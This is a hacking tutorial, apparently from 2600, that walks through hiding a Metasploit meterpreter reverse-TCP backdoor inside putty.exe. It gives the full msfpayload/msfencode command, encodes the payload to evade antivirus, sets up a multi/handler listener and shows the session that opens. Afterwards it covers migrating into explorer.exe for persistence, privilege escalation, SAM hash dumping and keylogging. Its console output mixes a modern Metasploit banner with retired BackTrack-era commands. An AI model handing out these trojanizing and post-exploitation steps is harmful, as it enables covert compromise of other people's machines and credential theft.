Backdooring with Metasploit

by Oddacon T. Ripper

Metasploit is a free, open-source pen-testing tool originally created by H.D. Moore in 2003.

Coded first in Perl, the Metasploit Framework was later converted to Ruby, and then officially signed over and picked up by the security group Rapid7.

Metasploit is available for all operating systems and comes pre-installed with BackTrack Linux, which is the OS I will be using in this article.

The good folks over at Offensive Security just released BackTrack 5.  So if you're new to BackTrack, I recommend downloading the ISO and booting live from a USB thumbdrive or DVD-R.

Once you have everything configured correctly, booted up, logged on, and connected to "your" Internet, we can finally set up our Metasploit attack!

To ensure we stay within the parameters of the law, I will be doing this Metasploit attack on my Windows 7 box.  We're just going to do a basic attack, inserting a backdoor into a EXE file.

We could just create a EXE backdoor, but that's no fun!  Instead, let's overwrite an already existing EXE file and install the backdoor onto that.

I'm going to use the program: putty.exe

Of course, you can choose whichever EXE you would like.  After you have an EXE of your liking we can create the backdoor using the payload command.

First, open a terminal and type:

$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1337 R | msfencode -t exe -e x86/shikata_ga_nai -c 1 -x /home/oddacon/Desktop/putty.exe -o /home/oddacon/Desktop/putty_h4x.exe

Where msfpalyoad is the program that will create our backdoor and windows/meterpreter/reverse_tcp is the type of payload we are using.

LHOST, obviously, is your local IP.

LPORT is the local port we are going to be listening on later.

The R defines using raw mode, and the pipe break (|) says we want to use another command: the encoder program msfencode to hopefully bypass the victim's anti-virus.

-t exe says we are encoding a Windows binary.

-e defines the encoder to use.

The x86/shikata_ga_nai is generally best, but there are several other encoders to choose from, as I will explain later.

-c 1 defines the number of times to encode - I encoded just once.

And finally we specify the paths: -x /home/oddacon/Desktop/putty.exe is the path to where putty.exe or the EXE file you have chosen resides.

-o /home/oddacon/Desktop/putty_h4x.exe specifies the path you want the EXE with the backdoor to go.

Once you have executed that, you should see the output message:

[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

We now have our backdoor "payload" ready for the victim to use.

We can then set up Metasploit to act as our server and wait for the victim's incoming connection through the backdoor EXE we just made.

Type clear and fire up the Metasploit console:

$ msfconsole
Metasploit tip: Display the Framework log using the log command, learn
more with help log


                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


       =[ metasploit v6.3.46-dev                          ]
+ -- --=[ 2378 exploits - 1233 auxiliary - 416 post       ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 >

Be patient, as it will take a moment to load all the exploits, payloads, and other goodies.  After loading, Metasploit will tell you how many "goodies" you have in your framework and when you last updated it.

You can always update by typing: svn up and you can also view the different exploits, payloads, etc. by typing:

msf6 > show exploits
msf6 > show payloads
msf6 > show encoders
msf6 > show etc..

Since this is a manual attack, we are going to use the generic payload handler: multi/handler

So after the Metasploit console loads up, type:

msf6 > use exploit/multi/handler

Metasploit will then recognize that we are using this exploit and return:

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >

on a new line in the console.  Then we set the payload to the same one we used earlier in creating the backdoor file:

msf6 > set PAYLOAD windows/meterpreter/reverse_tcp

Metasploit should return:

PAYLOAD => windows/meterpreter/reverse_tcp

if done correctly.  Next, set the LHOST to your IP:

msf6 > set LHOST 192.168.1.2 (which is my IP) 

and then the local port:

msf6 > set LPORT 1337 (the same we used to create the payload earlier) 

Everything is now set up, but before we execute and run our server, we can type:

msf6 > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT     1337             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

to make sure everything is running properly.

Then type exploit to start the server and wait for our victim to run the backdoor: putty_h4x.exe

[*] Starting the payload handler...
[*] Started reverse handler on port 1337
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.1.2:1337 -> 192.168.1.4:1134)
meterpreter>

It did not take long (since this is a simulated attack!) for our victim to run the putty_h4x.exe file.

As you can see, Metasploit opened a session from our victim: 192.168.1.4

Now that we have established a connection using the command interpreter meterpreter.  Let's get to work!

First, type ps to get a list of the systems running processes.  And then type: migrate [PID #]

For instance, I type migrate 2976 where 2976 is the PID number of the system's EXPLORER.EXE process.

[*] Migrating to 2976...
[*] Migration completed successfully.

Our backdoor is now within the EXPLORER.EXE process, so if the victim decides to delete putty_h4x.exe, the backdoor connection will not be broken.

From here, we can do a number of things.

For instance, the command getuid will return the current user the victim is running on.

The command getsystem will elevate your privilege.

Typing hashdump will display the contents of the SAM database.

There are still a number of commands we can such as downloading and uploading files, recording keystrokes, and other information, even shutting down the system.

For more info on meterpreter commands just type ? or help for the help menu.

And check out offensive-security.com/metasploit-unleashed for more information on the Metasploit Framework.

Return to $2600 Index